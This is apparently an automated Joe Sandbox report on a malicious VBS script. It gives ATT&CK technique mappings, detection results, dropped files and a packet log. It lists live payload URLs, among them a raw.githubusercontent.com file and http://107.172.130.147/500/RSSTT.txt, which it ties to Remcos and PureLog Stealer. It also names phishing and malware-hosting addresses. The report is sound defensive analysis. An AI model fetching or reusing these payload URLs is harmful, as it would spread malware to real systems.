Virtualization/Sandbox Evasion		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		11
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell		Logon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
2THp7fwNQD.vbs6%VirustotalBrowse
2THp7fwNQD.vbs5%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
raw.githubusercontent.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://aka.ms/pscore60%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt6%VirustotalBrowse
http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
https://raw.githubusercontent.com0%VirustotalBrowse
http://107.172.130.1477%VirustotalBrowse
http://107.172.130.147/500/RSSTT.txt1%VirustotalBrowse
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt94l;1%VirustotalBrowse
http://microsoft.co1%VirustotalBrowse
http://raw.githubusercontent.com0%VirustotalBrowse
https://github.com/Pester/Pester1%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
raw.githubusercontent.com
185.199.111.133
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalseunknown
http://107.172.130.147/500/RSSTT.txtfalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2386759505.000002072CAD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://raw.githubusercontent.compowershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C70C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://107.172.130.147powershell.exe, 00000004.00000002.2386759505.000002072B44F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://microsoft.copowershell.exe, 00000004.00000002.2420242779.00000207432D7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
https://go.micropowershell.exe, 00000004.00000002.2386759505.000002072C02D000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt94l;powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmpfalseunknown
https://contoso.com/powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2386759505.000002072CAD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/Licensepowershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://raw.githubusercontent.compowershell.exe, 00000004.00000002.2386759505.000002072C712000.00000004.00000800.00020000.00000000.sdmpfalseunknown
https://contoso.com/Iconpowershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://raw.githubusercontpowershell.exe, 00000004.00000002.2386759505.000002072C70C000.00000004.00000800.00020000.00000000.sdmpfalse
    		unknown
    https://aka.ms/pscore6powershell.exe, 00000002.00000002.2431492450.000001F9DA8F1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2431492450.000001F9DA90A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072B021000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2431492450.000001F9DA937000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072B021000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://oneget.orgpowershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    107.172.130.147
    		unknownUnited States
    		36352AS-COLOCROSSINGUSfalse
    185.199.111.133
    		raw.githubusercontent.comNetherlands
    		54113FASTLYUSfalse

    General Information

    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1523825
    Start date and time:2024-10-02 05:22:15 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 5m 29s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:8
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:2THp7fwNQD.vbs
    renamed because original name is a hash value
    Original Sample Name:2da99963acf87f71dc500922da2a8510fbb87c7f11bd5c165a602fbc7c76b177.vbs
    Detection:MAL
    Classification:mal100.expl.evad.winVBS@6/5@1/2
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 12
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .vbs

    Warnings

    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target powershell.exe, PID 5048 because it is empty
    • Execution Graph export aborted for target powershell.exe, PID 6652 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    23:23:15API Interceptor37x Sleep call for process: powershell.exe modified

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    107.172.130.147SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
    • 107.172.130.147/460/LKiGG.txt
    AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
    • 107.172.130.147/460/LKiGG.txt
    SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
    • 107.172.130.147/500/RSSTT.txt
    185.199.111.133R183nzNa89.exeGet hashmaliciousUnknownBrowse
      Shipping Documents.xlsGet hashmaliciousRemcosBrowse
        Scan Order and Specification 01-10- 2024.docxGet hashmaliciousRemcosBrowse
          DRAFT_PO.vbsGet hashmaliciousUnknownBrowse
            file.exeGet hashmaliciousXWorm, XmrigBrowse
              SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                https://rajkamalkanna.github.io/Facebook-Login-Page/Get hashmaliciousHTMLPhisherBrowse
                  https://vinitk1509.github.io/NETFLIXGet hashmaliciousHTMLPhisherBrowse
                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                      dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        raw.githubusercontent.comiJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                        • 185.199.108.133
                        00#U2800.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        asegurar.vbsGet hashmaliciousRemcosBrowse
                        • 185.199.110.133
                        dcsegura.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                        • 185.199.110.133
                        asegura.vbsGet hashmaliciousRemcosBrowse
                        • 185.199.108.133
                        R183nzNa89.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        hHNfR2jxEo.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                        • 185.199.109.133
                        tCNVKM4mkt.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                        • 185.199.108.133
                        R183nzNa89.exeGet hashmaliciousUnknownBrowse
                        • 185.199.111.133

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        FASTLYUSiJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                        • 185.199.108.133
                        https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                        • 151.101.194.137
                        https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                        • 151.101.2.137
                        http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                        • 151.101.194.137
                        http://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
                        • 185.199.110.154
                        00#U2800.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                        • 151.101.66.137
                        https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.noGet hashmaliciousHTMLPhisherBrowse
                        • 151.101.194.137
                        http://klasstackle.com/lfL15Q57vu4UGet hashmaliciousHTMLPhisherBrowse
                        • 151.101.194.137
                        AS-COLOCROSSINGUS0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                        • 107.172.148.248
                        CEjWMdiJnR.exeGet hashmaliciousDanaBotBrowse
                        • 23.95.182.47
                        8CRB0iJuy1.dllGet hashmaliciousDanaBotBrowse
                        • 23.95.182.47
                        CEjWMdiJnR.exeGet hashmaliciousDanaBotBrowse
                        • 23.95.182.47
                        8CRB0iJuy1.dllGet hashmaliciousDanaBotBrowse
                        • 23.95.182.47
                        CANADAXORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                        • 172.245.123.6
                        Shipping Documents.xlsGet hashmaliciousRemcosBrowse
                        • 104.168.32.148
                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.28227.30541.rtfGet hashmaliciousRemcosBrowse
                        • 104.168.7.8
                        Scan Order and Specification 01-10- 2024.docxGet hashmaliciousRemcosBrowse
                        • 104.168.7.8
                        ORDER-24930-067548.jsGet hashmaliciousStormKitty, XWormBrowse
                        • 192.210.215.11

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0eiJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                        • 185.199.111.133
                        0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                        • 185.199.111.133
                        PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 185.199.111.133
                        file.exeGet hashmaliciousCredential FlusherBrowse
                        • 185.199.111.133
                        mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                        • 185.199.111.133
                        DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                        • 185.199.111.133
                        http://tvsurf.jp/Get hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        https://files.constantcontact.com/2d77228b901/702368a5-3f96-4cb6-b61d-aab8728be1ff.pdfGet hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                        • 185.199.111.133

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):0.773832331134527
                        Encrypted:false
                        SSDEEP:3:NlllulPll/l:NllU
                        MD5:D5D1086387A17577FBAFCF708E28DF38
                        SHA1:E9D41C42D98AF9BD9EB41112F2F076D449A2C1E1
                        SHA-256:970985DCF17B6D55622781307B2CF531432368B48027F459866E1845A35AB9C3
                        SHA-512:4C2DA24A8CD6BFF1D8DA8B2FA040B9ED7E284B096E31B2ED46591F4913D78FFCBA7A81FEF835744DE6373AE79005BAFA6E6B468E818B2B325C191817AD526968
                        Malicious:false
                        Reputation:low
                        Preview:@...e...........................................................

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5vpljo5.x3n.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sdile2in.kkw.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smtk15xl.sry.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vn3lldqo.qmf.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        Static File Info

                        General

                        File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Entropy (8bit):3.7550907944387695
                        TrID:
                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                        • MP3 audio (1001/1) 32.22%
                        • Lumena CEL bitmap (63/63) 2.03%
                        • Corel Photo Paint (41/41) 1.32%
                        File name:2THp7fwNQD.vbs
                        File size:305'460 bytes
                        MD5:ae530aa8e50d1d20e9d0ec5ba8eaf303
                        SHA1:345200f8cc77dd41076b833f762a10de7f856758
                        SHA256:2da99963acf87f71dc500922da2a8510fbb87c7f11bd5c165a602fbc7c76b177
                        SHA512:bfc13328b373aa72f3ef6d956784f970ecc143a273222f573303cae9d2a3a2f0c48edc71083ec4b3113f63599dc2fc30bed2381239927cf93ec096dcb2b30e10
                        SSDEEP:3072:BsfAtXpeoijz/E6xkEu14r2AQjYKJtQj8uTJ1XVe+DnlmQRgt5p+Gw7xybv3s8QG:HtX8tr2AQsjDTJfeSPA9ZDEDviWG/3mG
                        TLSH:C654F31135EA7008F1F22FA356F955E94F6BB9652A39911E744C0B0E1BE3E80CE51BB3
                        File Content Preview:..L.m.x.k.P.O.i.C.f.R.h.G.W.U.m.A.o.P.l.k.K.q.e.R.S.f.z.C.L.t.R.i.L.q. .=. .".K.N.k.A.m.J.W.i.C.W.i.R.i.G.c.K.a.Q.Z.L.v.A.Z.c.J.R.L.R.o.q.z.W.j.u.".....U.h.m.i.P.i.i.N.z.t.i.n.x.R.L.A.L.k.i.m.p.L.i.c.x.f.d.U.n.L.q.L.z.v. .=. .".u.k.L.L.G.R.Z.W.K.G.h.e.K.i

                        File Icon

                        Icon Hash:68d69b8f86ab9a86

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 2, 2024 05:23:16.856153965 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:16.856188059 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:16.856369019 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:16.866296053 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:16.866313934 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.363605022 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.364351988 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.367503881 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.367513895 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.367824078 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.376434088 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.423397064 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.479547024 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.479598045 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.479624987 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.479657888 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.479686022 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.479698896 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.479726076 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.479741096 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.479760885 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.479866982 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.479871988 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.479916096 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.480360985 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.480418921 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.480572939 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.480577946 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.496134043 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.496203899 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.496208906 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.545787096 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.574134111 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.574187994 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.574212074 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.574274063 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.574290991 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.574320078 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.574352026 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.574378014 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.574410915 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.574430943 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.574438095 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.574451923 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.574451923 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.575109005 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.575172901 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.575176954 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.576997995 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.577014923 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.577047110 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.577105999 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.577105999 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.577117920 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.623802900 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.679120064 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.679133892 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.679162025 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.679261923 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.679261923 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.679276943 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.679333925 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.679980993 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.679997921 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.680095911 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.680095911 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.680102110 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.680617094 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.681572914 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.681591034 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.681687117 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.681691885 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.681787014 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.682568073 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.682584047 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.682681084 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.682688951 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.682735920 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:17.773309946 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:17.773329973 CEST44349710185.199.111.133192.168.2.12
